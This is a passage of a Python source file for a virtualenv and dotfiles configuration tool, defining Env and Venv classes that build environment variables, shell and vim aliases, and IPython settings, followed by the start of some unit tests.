return self.environ.__contains__(k)
def __iter__(self, *args, **kwargs):
return self.environ.__iter__(*args, **kwargs)
def iterkeys(self):
keys = self.osenviron_keys.keys()
allkeys = OrderedDict.fromkeys(
itertools.chain(['HOME'],
keys,
self.environ.keys()))
return allkeys.keys()
def iteritems_environ(self):
for key in self.iterkeys():
if key in self.environ:
yield (key, self.environ.get(key))
def iteritems(self):
yield ('environ', OrderedDict(self.iteritems_environ()))
yield ('aliases', self.aliases)
def get(self, k, default=None):
return self.environ.get(k, default)
def copy(self):
self.logevent('env.copy', level=logging.DEBUG)
return copy.deepcopy(self)
def __eq__(self, env):
if isinstance(env, Env):
return ((self.environ == env.environ) and (
self.aliases == env.aliases))
elif hasattr(env, 'keys'):
return self.environ == env
return False
@classmethod
def from_environ(cls, environ, verbose=False):
"""
Build an ``Env`` from a dict (e.g. ``os.environ``)
Args:
environ (dict): a dict with variable name keys and values
verbose (bool): whether to be verbose about dict merging
Returns:
Env: an Env environment built from the given environ dict
"""
env = cls((k, environ.get(k, '')) for k in cls.osenviron_keys)
logevent('env.from_environ',
env, # OrderedDict(environ).items(), indent=2),
wrap=True,
splitlines=True,
level=logging.DEBUG)
return env
def compress_paths(self, path_, keys=None, keyname=None):
"""
Given an arbitrary string,
replace absolute paths (starting with '/')
with the longest matching Env path variables.
Args:
path_ (str): a path string
Returns:
str: path string containing ``${VARNAME}`` variables
"""
if keys is not None:
keylist = keys
else:
#keys_longest_to_shortest
keydict = self.osenviron_keys.copy()
other_keys = [x for x in self.environ if x not in keydict]
default_keys = (list(keydict) +
[ 'VIRTUAL_ENV', '_SRC', '_ETC', '_WRD'])
keylist = default_keys[::-1] + other_keys
if not isinstance(path_, STR_TYPES):
return path_
_path = path_
for varname in keylist:
value = self.environ.get(varname)
if isinstance(value, STR_TYPES) and value.startswith('/'):
_path = _path.replace(value + "/", '${%s}/' % varname)
for varname in ['VENVSTRAPP', 'VENVSTR']:
if keyname == varname:
continue
value = self.environ.get(varname)
if isinstance(value, STR_TYPES):
if value in _path:
_path = _path.replace(value, '${%s}' % varname)
return _path
def to_string_iter(self, **kwargs):
yield '## <env>'
compress_paths = kwargs.get('compress_paths')
for name, value in self.iteritems_environ():
if compress_paths:
value = self.compress_paths(value, keyname=name)
yield "{name}={value}".format(name=name, value=repr(value))
yield '## </env>'
def __str__(self):
#return u'\n'.join(self.to_string_iter())
return self.to_json(indent=2)
def __repr__(self):
return "<Env: len=%d>" % len(self.environ)
# XXX
return repr(self.to_dict())
#"Env: " + repr(str(self))
def ndiff(self, other_env):
"""
Args:
other_env (Env): env to compare with
Returns:
iterable: strings from difflib.ndiff
"""
if not hasattr(other_env, 'to_string_iter'):
raise AttributeError('can only compare envs with envs')
return difflib.unified_diff(
list(self.to_string_iter()),
list(other_env.to_string_iter()))
def to_dict(self):
return OrderedDict(self.iteritems())
def to_json(self, *args, **kwargs):
_dict = self.to_dict()
try:
jsonstr = json.dumps(_dict, *args, cls=VenvJSONEncoder, **kwargs)
return jsonstr
except Exception as e:
print('\n\n\n\n\n')
print(pprint.pformat(_dict))
raise
def shell_quote(var):
"""
Escape single quotes and add double quotes around a given variable.
Args:
_str (str): string to add quotes to
Returns:
str: string wrapped in quotes
.. warning:: This is not safe for untrusted input and only valid
in this context (``os.environ``).
"""
_repr = repr(var)
if _repr.startswith('\''):
return "\"%s\"" % _repr[1:-1]
def shell_varquote(str_):
"""
Add doublequotes and shell variable brackets to a string
Args:
str_ (str): string to varquote (e.g. ``VIRTUAL_ENV``)
Returns:
str: "${VIRTUAL_ENV}"
"""
return shell_quote('${%s}' % str_)
def _get_shell_version():
"""
Returns:
tuple: (shell_namestr, versionstr) of the current ``$SHELL``
"""
shell = os.environ.get('SHELL')
if not shell:
raise Exception('SHELL is not set')
output = subprocess.check_output(
(shell, '--version')).split('\n', 1)[0]
if output.startswith('GNU bash, version '):
verstr = output.lstrip('GNU bash, version ')
return ('bash', verstr)
if output.startswith('zsh '):
return output.split(' ', 1)
def _shell_supports_declare_g():
"""
Returns:
bool: True only if the ``$SHELL`` is known to support ``declare -g``
"""
# NOTE: OSX still has bash 3.2, which does not support '-g'
shell, verstr = _get_shell_version()
if shell == 'zsh':
return True
if shell == 'bash':
if verstr.startswith('4'):
return True
return False
class Venv(object):
"""
A virtual environment configuration generator
"""
def __init__(self,
VENVSTR=None,
VENVSTRAPP=None,
__WRK=None,
__DOTFILES=None,
WORKON_HOME=None,
VIRTUAL_ENV_NAME=None,
VENVPREFIX=None,
VIRTUAL_ENV=None,
_SRC=None,
_APP=None,
_WRD=None,
env=None,
from_environ=False,
open_editors=False,
open_terminals=False,
dont_reflect=True,
debug=False,
show_diffs=False,
**kwargs):
"""
Initialize a new Venv from a default configuration
Keyword Arguments:
env (Env): initial Env
VENVSTR (str): VIRTUAL_ENV_NAME ('dotfiles') or VIRTUAL_ENV
('$WORKON_HOME/dotfiles')
VENVSTRAPP (str): _APP ('dotfiles', 'dotfiles/etc/bash')
__WRK (str): None (~/-wrk) OR
path to a workspace root
containing one or more ``WORKON_HOME`` directories
.. code:: bash
test $__WRK == echo "${HOME}/-wrk"
cdwrk
__DOTFILES (str): None or path to dotfiles symlink
.. code:: bash
test "${__DOTFILES}" == "~/-dotfiles"
cddotfiles ; cdd
WORKON_HOME (str): path to a ``WORKON_HOME`` directory
containing zero or more 'VIRTUAL_ENV`` directories
.. code:: bash
test $WORKON_HOME == echo "${__WRK}/-ve27"
cdworkonhome ; cdwh
VIRTUAL_ENV_NAME (str): None or a string path component
.. code:: bash
test "$VIRTUAL_ENV" == "${WORKON_HOME}/${VIRTUAL_ENV_NAME}"
cdvirtualenv ; cdv
.. note:: if None (not specified),
``VIRTUAL_ENV_NAME`` defaults to
the basename of ``$VIRTUAL_ENV``
or what is in ``os.environ``, if ``from_environ`` is True)
VENVPREFIX (str): for when VIRTUAL_ENV is not set {/,~,~/-wrk}
some paths may not make sense with PREFIX=/.
#TODO: list sensible defaults
# the issue here is whether to raise an error when
VENVSTR or VIRTUAL_ENV are not specified.
VIRTUAL_ENV (str): None, a path to a virtualenv, or the basename
of a virtualenv in ``$WORKON_HOME``
.. code:: bash
test "$VIRTUAL_ENV" == "${WORKON_HOME}/${VIRTUAL_ENV_NAME}"
cdvirtualenv ; cdv
.. note:: if not specified,
``$_APP`` defaults to the basename of ``$VIRTUAL_ENV``
(or what is in os.environ, if ``from_environ`` is True)
_SRC (str): None or a string path component
.. code:: bash
test "$_SRC" == "${VIRTUAL_ENV}/src"
cdsrc ; cds
_APP (str): None or a string path component
.. code:: bash
test "${_SRC}/${_APP}" == "${_WRD}"
cdwrd ; cdw
.. note:: if not specified,
``$_APP`` defaults to the basename of ``$VIRTUAL_ENV``
(or what is in os.environ, if ``from_environ`` is True)
_WRD (str): None or path to working directory
.. code:: bash
test "${_SRC}/${_APP}" == "${_WRD}"
cdwrd ; cdw
env (Env): an initial Env with zero or more values for self.env
(default: None)
from_environ (bool): read self.env from ``os.environ``
(default: False)
open_editors (bool): Open an editor with Venv.project_files
(default: False)
open_terminals (bool): Open terminals for the Venv
(default: False)
dont_reflect (bool): Always create aliases and functions
referencing ``$_WRD`` even if ``$_WRD`` doesn't exist.
(default: True)
Raises:
Exception: if both ``env`` and ``from_environ=True`` are specified
Exception: if VIRTUAL_ENV is not specified or incalculable
from the given combination of
``virtualenv`` and ``from_environ`` arguments
"""
if from_environ:
if env is None:
env = Env.from_environ(os.environ)
else:
raise Exception(
"both 'env' and 'from_environ=True' were specified")
if env is None:
env = Env()
keys = [
'VENVSTR',
'VENVSTRAPP',
'__WRK',
'__DOTFILES',
'WORKON_HOME',
'VIRTUAL_ENV',
'VENVPREFIX',
'_APP',
'VIRTUAL_ENV_NAME',
'_SRC',
'_WRD']
kwargs = OrderedDict()
def lookup(attr, default=None):
return lookup_from_kwargs_env(kwargs, env, attr, default=default)
_SENTINEL = None
_vars = vars()
for key in keys:
value = _vars.get(key, _SENTINEL)
if value is not _SENTINEL:
kwargs[key] = value
env[key] = lookup(key)
VENVSTR = env.get('VENVSTR')
if VENVSTR:
env = Venv.parse_VENVSTR(env=env,
from_environ=from_environ,
**kwargs)
self.env = env
built_envs = self.build(env=env,
from_environ=from_environ,
dont_reflect=dont_reflect,
debug=debug,
show_diffs=show_diffs)
if not built_envs:
raise ConfigException(built_envs)
self.env = built_envs[-1]
if open_editors:
self.open_editors()
if open_terminals:
self.open_terminals()
def build(self,
env=None,
VENVSTR=None,
VENVSTRAPP=None,
VENVPREFIX=None,
from_environ=False,
dont_reflect=True,
debug=False,
show_diffs=False,
build_user_aliases=False,
build_userlog_env=False,
):
"""
Build :py:class:`Venv` :py:class:`Steps` with :py:class:`StepBuilder`
"""
conf = OrderedDict()
if VENVSTR is not None:
conf['VENVSTR'] = VENVSTR
if VENVSTRAPP is not None:
conf['VENVSTRAPP'] = VENVSTRAPP
if VENVPREFIX is not None:
conf['VENVPREFIX'] = VENVPREFIX
conf.update({
'from_environ': from_environ,
'dont_reflect': dont_reflect,
'debug': debug,
'show_diffs': show_diffs,
})
builder = StepBuilder(conf=conf)
builder.add_step(PrintEnvStderrStep)
builder.add_step(build_dotfiles_env)
builder.add_step(build_virtualenvwrapper_env)
builder.add_step(build_venv_activate_env)
builder.add_step(build_conda_env)
builder.add_step(build_conda_cfg_env)
builder.add_step(build_venv_activate_env)
builder.add_step(build_venv_paths_full_env)
builder.add_step(build_venv_paths_cdalias_env)
# if you would like to fork, fork.
# if you would like to submit a patch or a pull request, please do.
if build_user_aliases:
builder.add_step(build_user_aliases_env)
if build_usrlog_env:
builder.add_step(build_usrlog_env)
logevent('Venv.build',
dict(env=env, conf=conf),
wrap=True,
level=logging.DEBUG)
new_env = builder.build(env=env)
#logevent('Venv.build', dict(env=env, conf=conf), wrap=True, level=logging.INFO)
return new_env
@staticmethod
def parse_VENVSTR(env=None,
VENVSTR=None,
VENVSTRAPP=None,
VENVPREFIX=None,
VIRTUAL_ENV=None,
VIRTUAL_ENV_NAME=None,
_APP=None,
_SRC=None,
_WRD=None,
__WRK=None,
WORKON_HOME=None,
from_environ=False,
**kwargs):
"""
Get the path to a virtualenv given a ``VENVSTR``
Keyword Arguments:
env (Env):
VENVSTR (str): a path to a virtualenv containing ``/``
OR just the name of a virtualenv in ``$WORKON_HOME``
VENVSTRAPP (str):
VENVPREFIX (str):
WORKON_HOME (str):
from_environ (bool): whether to try and read from
``os.environ["VIRTUAL_ENV"]``
Returns:
str: a path to a virtualenv (for ``$VIRTUAL_ENV``)
"""
_vars = vars()
keys = [
'__WRK',
'WORKON_HOME',
'VENVSTR',
'VENVSTRAPP',
'VENVPREFIX',
'VIRTUAL_ENV',
'VIRTUAL_ENV_NAME',
'_APP',
'_SRC',
'_WRD',
]
if env is None:
env = Env()
if from_environ is True:
if VENVSTR or VENVSTRAPP or VENVPREFIX:
raise ConfigException(
"from_environ=True cannot be specified with any of "
"[VENVSTR, VENVSTRAPP, VENVPREFIX]")
env = Env.from_environ(os.environ)
def lookup(attr, default=None):
return lookup_from_kwargs_env(kwargs, env, attr, default=default)
SENTINEL = None
for key in keys:
value = _vars.get(key, SENTINEL)
if value is not SENTINEL:
kwargs[key] = value
env[key] = lookup(key)
logevent('parse_VENVSTR_input', {'kwargs': kwargs, 'env': env})
WORKON_HOME = lookup('WORKON_HOME', default=get_WORKON_HOME_default())
VENVSTR = lookup('VENVSTR')
if VENVSTR is not None:
env['VENVSTR'] = VENVSTR
VENVSTRAPP = lookup('VENVSTRAPP', default=lookup('_APP'))
_APP = lookup('_APP',
default=lookup('VENVSTRAPP',
default=lookup('VENVSTR')))
if VENVSTR not in (None, ''):
if '/' not in VENVSTR:
VIRTUAL_ENV = joinpath(WORKON_HOME, VENVSTR)
else:
VIRTUAL_ENV = os.path.abspath(VENVSTR)
if VENVSTRAPP is not None:
VIRTUAL_ENV_NAME = VENVSTRAPP.split(os.path.sep)[0]
_APP = VENVSTRAPP
else:
if VIRTUAL_ENV:
VIRTUAL_ENV_NAME = os.path.basename(VIRTUAL_ENV)
else:
VIRTUAL_ENV_NAME = VENVSTR
_APP = VIRTUAL_ENV_NAME
VENVSTRAPP = _APP
if VIRTUAL_ENV is None:
VIRTUAL_ENV = lookup('VIRTUAL_ENV')
if VIRTUAL_ENV is None:
if WORKON_HOME and VIRTUAL_ENV_NAME:
VIRTUAL_ENV = joinpath(WORKON_HOME, VIRTUAL_ENV_NAME)
if VIRTUAL_ENV:
env['VIRTUAL_ENV'] = VIRTUAL_ENV
VENVPREFIX = lookup('VENVPREFIX', default=VIRTUAL_ENV)
env['WORKON_HOME'] = WORKON_HOME
env['VENVSTR'] = VENVSTR
env['VENVSTRAPP'] = VENVSTRAPP
env['_APP'] = _APP
env['VIRTUAL_ENV_NAME'] = VIRTUAL_ENV_NAME
env['VENVPREFIX'] = VENVPREFIX
env['VIRTUAL_ENV'] = VIRTUAL_ENV
logevent('parse_VENVSTR_output', {'env': env, 'kwargs': kwargs, })
#import ipdb
# ipdb.set_trace()
return env
@property
def aliases(self):
"""
Returns:
OrderedDict: self.env.aliases
"""
return self.env.aliases
@staticmethod
def _configure_sys(env=None, from_environ=False, pyver=None):
"""
Configure ``sys.path`` with the given :py:mod:`Env`,
or from ``os.environ``.
Args:
env (Env): Env to configure sys.path according to
(default: None)
from_environ (bool): whether to read Env from ``os.environ``
(default: False)
pyver (str): "python2.7" "python3.4" defaults to ``sys.platform``
.. note:: This method adds
``/usr/local/python.ver.ver/dist-packages/IPython/extensions``
to ``sys.path``
Why? When working in a virtualenv which does not have
an additional local copy of IPython installed,
the lack of an extensions path was causing errors
in regards to missing extensions.
If the path does not exist, it will not be added.
"""
if from_environ:
env = Env.from_environ(os.environ)
if pyver is None:
pyver = get_pyver()
env['_PYLIB'] = joinpath(env['_LIB'], pyver)
env['_PYSITE'] = joinpath(env['_PYLIB'], 'site-packages')
# emulate virtualenv check for no-global-site-packages.txt
no_global_site_packages = joinpath(
env('_PYLIB'), 'no-global-site-packages.txt')
if not os.path.exists(no_global_site_packages):
sys_libdir = joinpath("/usr/lib", pyver)
# XXX: **OVERWRITE** sys.path
sys.path = [joinpath(sys_libdir, p) for p in (
"", "plat-linux2", "lib-tk", "lib-dynload")]
# XXX: append /usr/local/lib/{pyver}/IPython/extensions # TODO?
ipython_extensions = (
'/usr/local/lib/%s/dist-packages/IPython/extensions'
% pyver)
if not os.path.exists(ipython_extensions):
log.info("IPython extensions not found: %r",
ipython_extensions)
if ipython_extensions not in sys.path:
sys.path.append(ipython_extensions)
# optimize_python_path(sys.path)
site.addsitedir(env['_PYSITE'])
return env
def configure_sys(self):
"""
Returns:
list: ``sys.path`` list from ``_configure_sys``.
"""
return Venv._configure_sys(self.env)
@classmethod
def workon(cls, env=None, VENVSTR=None, VENVSTRAPP=None, **kwargs):
"""
Args:
VENVSTR (str): a path to a virtualenv containing ``/``
OR just the name of a virtualenv in ``$WORKON_HOME``
VENVSTRAPP (str): e.g. ``dotfiles`` or ``dotfiles/docs``
kwargs (dict): kwargs to pass to Venv (see ``Venv.__init__``)
Returns:
Venv: an intialized ``Venv``
"""
return cls(env=env, VENVSTR=VENVSTR, VENVSTRAPP=VENVSTRAPP, **kwargs)
@staticmethod
def _configure_ipython(c=None,
platform=None,
sympyprinting=False,
parallelmagic=False,
storemagic=True,
storemagic_autorestore=False,
autoreload=True,
deep_reload=False,
venvaliases=True,
usrlog=True,
venv_ipyconfig_debug=False,
setup_func=None):
"""
Configure IPython with ``autoreload=True``, ``deep_reload=True``,
the **storemagic** extension, the **parallelmagic**
extension if ``import zmq`` succeeds,
and ``DEFAULT_ALIASES`` (``cd`` aliases are not currently working).
Args:
c (object): An IPython configuration object
(``get_ipython()``)
platform (str): platform string
(``uname``: {'Linux', 'Darwin'})
.. note:: If ``None``, ``platform`` is necessarily autodetected
so that ``ps`` and ``ls`` aliases work with syntax coloring and
Linux and OSX BSD coreutils.
setup_func (function): a function to call with
config as the first positional argument,
**after** default configuration (default: ``None``)
References:
* http://ipython.org/ipython-doc/dev/config/
* http://ipython.org/ipython-doc/dev/config/options/terminal.html
"""
if c is None:
if not IN_IPYTHON_CONFIG:
# skip IPython configuration
log.error("not in_venv_ipyconfig")
return
else:
c = IPYTHON_CONFIG # get_config()
if venv_ipyconfig_debug:
import pdb; pdb.set_trace()
# c.InteractiveShellApp.ignore_old_config = True
c.InteractiveShellApp.log_level = 20
# TODO: c.InteractiveShellApp.extensions.append?
c.InteractiveShellApp.extensions = [
# 'autoreload',
]
if sympyprinting:
try:
import sympy
c.InteractiveShellApp.extensions.append('sympyprinting')
except ImportError as e:
pass
if parallelmagic:
try:
import zmq
zmq
c.InteractiveShellApp.extensions.append('parallelmagic')
except ImportError:
pass
# c.InteractiveShell.autoreload = autoreload
c.InteractiveShell.deep_reload = deep_reload
if storemagic:
# %store [name]
c.InteractiveShellApp.extensions.append('storemagic')
c.StoreMagic.autorestore = storemagic_autorestore
if venvaliases:
ipython_default_aliases = get_IPYTHON_ALIAS_DEFAULTS(
platform=platform).items()
c.AliasManager.default_aliases.extend(ipython_default_aliases)
ipython_alias_overlay = get_IPYTHON_ALIAS_OVERLAY()
c.AliasManager.default_aliases.extend(ipython_alias_overlay)
if usrlog:
# TODO: if kwargs.get('_USRLOG', kwargs.get('__USRLOG'))
usrlog_alias_overlay = get_USRLOG_ALIAS_OVERLAY()
c.AliasManager.default_aliases.extend(usrlog_alias_overlay)
output = c
if setup_func:
output = setup_func(c)
return output
def configure_ipython(self, *args, **kwargs):
"""
Configure IPython with ``Venv._configure_ipython`` and
``user_aliases`` from ``self.aliases.items()``.
Args:
args (list): args for ``Venv._configure_ipython``
kwargs (dict): kwargs for ``Venv._configure_ipython``.
"""
def setup_func(c):
c.AliasManager.user_aliases = [
(k, v) for (k, v) in self.env.aliases.items()
if not k.startswith('cd')]
return Venv._configure_ipython(*args, setup_func=setup_func, **kwargs)
def generate_vars_env(self, **kwargs):
"""
Generate a string containing VARIABLE='./value'
"""
for block in self.env.to_string_iter(**kwargs):
yield block
def generate_bash_env(self,
shell_keyword='export ',
shell_quotefunc=shell_quote,
include_paths=True,
include_aliases=True,
include_cdaliases=False,
**kwargs):
"""
Generate a ``source``-able script for the environment variables,
aliases, and functions defined by the current ``Venv``.
Keyword Arguments:
shell_keyword (str): shell variable def (default: "export ")
include_paths (bool): Include environ vars in output (default: True)
include_aliases (bool): Include aliases in output (default: True)
include_cdaliases (bool): Include cdaliases in output (default: False)
compress_paths (bool): Compress paths to $VAR (default=False)
Yields:
str: block of bash script
"""
compress_paths = kwargs.get('compress_paths')
if include_paths:
for k, v in self.env.iteritems_environ():
# TODO: XXX:
if v is None:
v = ''
if compress_paths:
v = self.env.compress_paths(v, keyname=k)
# if _shell_supports_declare_g():
# shell_keyword="declare -grx "
# yield "declare -grx %s=%r" % (k, v)
# else:
# yield "export %s=%r" % (k, v
# yield("declare -r %k" % k, file=output)
yield "{keyword}{VAR}={value}".format(
keyword=shell_keyword,
VAR=k,
value=shell_quotefunc(v))
if include_cdaliases:
yield CdAlias.BASH_CDALIAS_HEADER
if include_aliases:
for k, v in self.env.aliases.items():
bash_alias = None
if hasattr(v, 'to_bash_function'):
bash_alias = v.to_bash_function()
if hasattr(v, 'to_shell_str'):
bash_alias = v.to_shell_str()
else:
_alias = IpyAlias(v, k)
bash_alias = _alias.to_shell_str()
if compress_paths:
bash_alias = self.env.compress_paths(bash_alias, keyname=k)
yield bash_alias
def generate_bash_cdalias(self):
"""
Generate a ``source``-able script for cdalias functions
Yields:
str: block of bash script
"""
yield CdAlias.BASH_CDALIAS_HEADER
for k, v in self.env.aliases.items():
if isinstance(v, CdAlias):
yield v.to_bash_function()
elif k in ('cdls', 'cdhelp'):
yield IpyAlias(v, k).to_shell_str()
def generate_vim_cdalias(self):
"""
Generate a ``source``-able vimscript for vim
Yields:
str: block of vim script
"""
yield CdAlias.VIM_HEADER_TEMPLATE
# for k, v in self.env.items():
# yield ("export %s=%r" % (k, v))
for k, v in self.env.aliases.items():
if hasattr(v, 'to_vim_function'):
yield v.to_vim_function()
def generate_venv_ipymagics(self):
"""
Generate an ``venv_ipymagics.py`` file for IPython
Yields:
str: block of Python code
"""
yield CdAlias.VENV_IPYMAGICS_FILE_HEADER
for k, v in self.env.aliases.items():
if hasattr(v, 'to_ipython_method'):
for block in v.to_ipython_method():
yield block
yield CdAlias.VENV_IPYMAGICS_FOOTER
@property
def project_files(self):
return self._project_files()
def _project_files(self, extension='.rst'):
"""
Default list of project files for ``_EDITCMD_``.
Returns:
list: list of paths relative to ``$_WRD``.
"""
default_project_files = (
'README{}'.format(extension),
'CHANGELOG{}'.format(extension),
'Makefile',
'setup.py',
'requirements.txt',
'.git/config',
'.gitignore',
'.hg/hgrc',
'.hgignore',
'',
'.',
'docs',
)
return default_project_files
@property
def PROJECT_FILES(self):
PROJECT_FILES = ' '.join(
shell_quote(joinpath(self.env['_WRD'], fpath))
for fpath in (self.project_files))
return PROJECT_FILES
@property
def _edit_project_cmd(self):
"""
Command to edit ``self.project_files``
Returns:
str: ``$_EDIT_`` ``self.project_files``
"""
return "%s %s" % (self.env['_EDIT_'], self.PROJECT_FILES)
@property
def _terminal_cmd(self):
"""
Command to open a terminal
Returns:
str: env.get('TERMINAL') or ``/usr/bin/gnome-terminal``
"""
# TODO: add Terminal.app
return self.env.get('TERMINAL', '/usr/bin/gnome-terminal')
@property
def _open_terminals_cmd(self):
"""
Command to open ``self._terminal_cmd`` with a list of initial
named terminals.
"""
# TODO: add Terminal.app (man Terminal.app?)
cmd = (
self._terminal_cmd,
'--working-directory', self.env['_WRD'],
'--tab', '--title', '%s: bash' % self.env['_APP'],
'--command', 'bash',
'--tab', '--title', '%s: serve' % self.env['_APP'],
'--command', "bash -c 'we %s %s'; bash" % (
self.env['VIRTUAL_ENV'], self.env['_APP']), #
'--tab', '--title', '%s: shell' % self.env['_APP'],
'--command', "bash -c %r; bash" % self.env['_SHELL_']
)
return cmd
def system(self, cmd=None):
"""
Call ``os.system`` with the given command string
Args:
cmd (string): command string to call ``os.system`` with
Raises:
Exception: if ``cmd`` is None
NotImplementedError: if ``cmd`` is a tuple
"""
if cmd is None:
raise Exception()
if isinstance(cmd, (tuple, list)):
_cmd = ' '.join(cmd)
# TODO: (subprocess.Popen)
raise NotImplementedError()
elif isinstance(cmd, (str,)):
_cmd = cmd
return os.system(_cmd)
def open_editors(self):
"""
Run ``self._edit_project_cmd``
"""
cmd = self._edit_project_cmd
return self.system(cmd=cmd)
def open_terminals(self):
"""
Run ``self._open_terminals_cmd``
"""
cmd = self._open_terminals_cmd
return self.system(cmd=cmd)
def to_dict(self):
"""
Returns:
OrderedDict: OrderedDict(env=self.env, aliases=self.aliases)
"""
return self.env.to_dict()
#OrderedDict(
#env=self.env,
## aliases=self.aliases,
#)
def to_json(self, indent=None):
"""
Args:
indent (int): number of spaces with which to indent JSON output
Returns:
str: json.dumps(self.to_dict())
"""
return json.dumps(self.to_dict(), indent=indent, cls=VenvJSONEncoder)
@staticmethod
def update_os_environ(venv, environ=None):
"""
Update os.environ for the given venv
Args:
environ (dict): if None, defaults to os.environ
Returns:
dict: updated environ dict
"""
environ = environ or os.environ
environ.update((k, str(v)) for (k, v) in venv.env.environ.items())
return environ
def call(self, command):
"""
Args:
command (str): command to run
Returns:
str: output from subprocess.call
"""
env = self.update_os_environ(self, os.environ)
VENVPREFIX = self.env.get('VENVPREFIX',
self.env.get('VIRTUAL_ENV', None))
if VENVPREFIX is None:
raise ConfigException("VENVPREFIX is None")
config = {
'command': command,
'shell': True,
#'env': env,
'VENVPREFIX': VENVPREFIX,
'cwd': VENVPREFIX}
logevent('subprocess.call', config, level=logging.INFO)
config.pop('command')
config.pop('VENVPREFIX')
return subprocess.call(command + " #venv.call", **config)
def get_IPYTHON_ALIAS_DEFAULTS(platform=None):
if platform is None:
platform = sys.platform
IS_DARWIN = platform == 'darwin'
LS_COLOR_AUTO = "--color=auto"
if IS_DARWIN:
LS_COLOR_AUTO = "-G"
PSX_COMMAND = 'ps uxaw'
PSF_COMMAND = 'ps uxawf'
PS_SORT_CPU = '--sort=-pcpu'
PS_SORT_MEM = '--sort=-pmem'
if IS_DARWIN:
PSX_COMMAND = 'ps uxaw'
PSF_COMMAND = 'ps uxaw'
PS_SORT_CPU = '-c'
PS_SORT_MEM = '-m'
DEFAULT_ALIASES = OrderedDict((
('cp', 'cp'),
('bash', 'bash'),
('cat', 'cat'),
('chmodr', 'chmod -R'),
('chownr', 'chown -R'),
('egrep', 'egrep --color=auto'),
('fgrep', 'fgrep --color=auto'),
('git', 'git'),
('ga', 'git add'),
('gd', 'git diff'),
('gdc', 'git diff --cached'),
('gs', 'git status'),
('gl', 'git log'),
('grep', 'grep --color=auto'),
('grin', 'grin'),
('grind', 'grind'),
('grinpath', 'grin --sys-path'),
('grindpath', 'grind --sys-path'),
('grunt', 'grunt'),
('gvim', 'gvim'),
('head', 'head'),
('hg', 'hg'),
('hgl', 'hg log -l10'),
('hgs', 'hg status'),
('htop', 'htop'),
('ifconfig', 'ifconfig'),
('ip', 'ip'),
('last', 'last'),
('la', 'ls {} -A'.format(LS_COLOR_AUTO)),
('ll', 'ls {} -al'.format(LS_COLOR_AUTO)),
('ls', 'ls {}'.format(LS_COLOR_AUTO)),
('lt', 'ls {} -altr'.format(LS_COLOR_AUTO)),
('lll', 'ls {} -altr'.format(LS_COLOR_AUTO)),
('lz', 'ls {} -alZ'.format(LS_COLOR_AUTO)),
('lxc', 'lxc'),
('make', 'make'),
('mkdir', 'mkdir'),
('netstat', 'netstat'),
('nslookup', 'nslookup'),
('ping', 'ping'),
('mv', 'mv'),
('ps', 'ps'),
('psf', PSF_COMMAND),
('psx', PSX_COMMAND),
('psh', '{} | head'.format(PSX_COMMAND)),
('psc', '{} {}'.format(PSX_COMMAND, PS_SORT_CPU)),
('psch', '{} {} | head'.format(PSX_COMMAND, PS_SORT_CPU)),
('psm', '{} {}'.format(PSX_COMMAND, PS_SORT_MEM)),
('psmh', '{} {} | head'.format(PSX_COMMAND, PS_SORT_MEM)),
('psfx', PSF_COMMAND),
('pydoc', 'pydoc'),
('pyline', 'pyline'),
('pyrpo', 'pyrpo'),
('route', 'route'),
('rm', 'rm'),
('rsync', 'rsync'),
('sqlite3', 'sqlite3'),
('ss', 'ss'),
('ssv', 'supervisord'),
('stat', 'stat'),
('sudo', 'sudo'),
('sv', 'supervisorctl'),
('t', 'tail -f'),
('tail', 'tail'),
('thg', 'thg'),
('top', 'top'),
('tracepath', 'tracepath'),
('tracepath6', 'tracepath6'),
('vim', 'vim'),
('uptime', 'uptime'),
('which', 'which'),
('who_', 'who'),
('whoami', 'whoami'),
('zsh', 'zsh'),
))
return DEFAULT_ALIASES
def get_IPYTHON_ALIAS_OVERLAY():
IPYTHON_ALIAS_OVERLAY = (
('pydoc', 'pydoc %l | cat'),
# ('pip', 'pip'),
('venv', 'venv'),
)
return IPYTHON_ALIAS_OVERLAY
def get_USRLOG_ALIAS_OVERLAY():
USRLOG_ALIAS_OVERLAY = (
('ut', 'tail $$_USRLOG'),
)
return USRLOG_ALIAS_OVERLAY
def ipython_main():
"""
Configure IPython with :py:class:`Venv`
:py:method:`configure_ipython`
(:py:method:`_configure_ipython`).
"""
venv = None
if 'VIRTUAL_ENV' in os.environ:
venv = Venv(from_environ=True)
venv.configure_ipython()
else:
Venv._configure_ipython()
def ipython_imports():
"""
Default imports for IPython (currently unused)
"""
from IPython.external.path import path
path
from pprint import pprint as pp
pp
from pprint import pformat as pf
pf
import json
def ppd(self, *args, **kwargs):
print(type(self))
print(
json.dumps(*args, indent=2))
# Tests
class VenvTestUtils(object):
"""
Test fixtures for TestCases and examples
"""
@staticmethod
def build_env_test_fixture(env=None):
if env is None:
env = Env()
env['__WRK'] = env.get('__WRK',
get___WRK_default(env=env))
env['WORKON_HOME'] = env.get('WORKON_HOME',
get_WORKON_HOME_default(env=env))
env['VENVSTR'] = env.get('VENVSTR',
'dotfiles')
env['VENVSTRAPP'] = env.get('VENVSTRAPP',
env['VENVSTR'])
env['_APP'] = env.get('_APP',
env.get('VENVSTRAPP',
env['VENVSTR'])) # TODO || basename(VENVPREFIX)
env['VIRTUAL_ENV_NAME'] = env.get('VIRTUAL_ENV_NAME',
os.path.basename(
env['VENVSTR']))
env['VIRTUAL_ENV'] = env.get('VIRTUAL_ENV',
joinpath(
env['WORKON_HOME'],
env['VIRTUAL_ENV_NAME']))
env['VENVPREFIX'] = env.get('VENVPREFIX') or env.get('VIRTUAL_ENV')
env['_SRC'] = joinpath(env['VENVPREFIX'], 'src')
env['_ETC'] = joinpath(env['VENVPREFIX'], 'etc')
env['_WRD'] = joinpath(env['_SRC'], env['_APP'])
return env
@staticmethod
def capture_io(f):
"""
Add stdout and sterr kwargs to a function call
and return (output, _stdout, _stderr)
"""
functools.wraps(f)
def __capture_io(*args, **kwargs):
# ... partial/wraps
_stdout = kwargs.get('stdout', StringIO())
_stderr = kwargs.get(StringIO())
ioconf = {"stdout": _stdout, "stderr": _stderr}
kwargs.update(ioconf)
output = f(*args, **kwargs)
# _stdout.seek(0), _stderr.seek(0)
return output, _stdout, _stderr
return __capture_io
if __name__ == '__main__':
_TestCase = unittest.TestCase
else:
_TestCase = object
class VenvTestCase(_TestCase):
"""unittest.TestCase or object"""
class Test_001_lookup(VenvTestCase, unittest.TestCase):
def test_100_lookup(self):
kwargs = {'True': True, 'envTrue': True,
'isNone': None, 'kwargsTrue': True,
'collide': 'kwargs'}
env = {'True': True, 'envTrue': True,
'isNone': None, 'envNone': True,
'collide': 'env'}
def lookup(attr, default=None):
return lookup_from_kwargs_env(kwargs, env, attr, default=default)
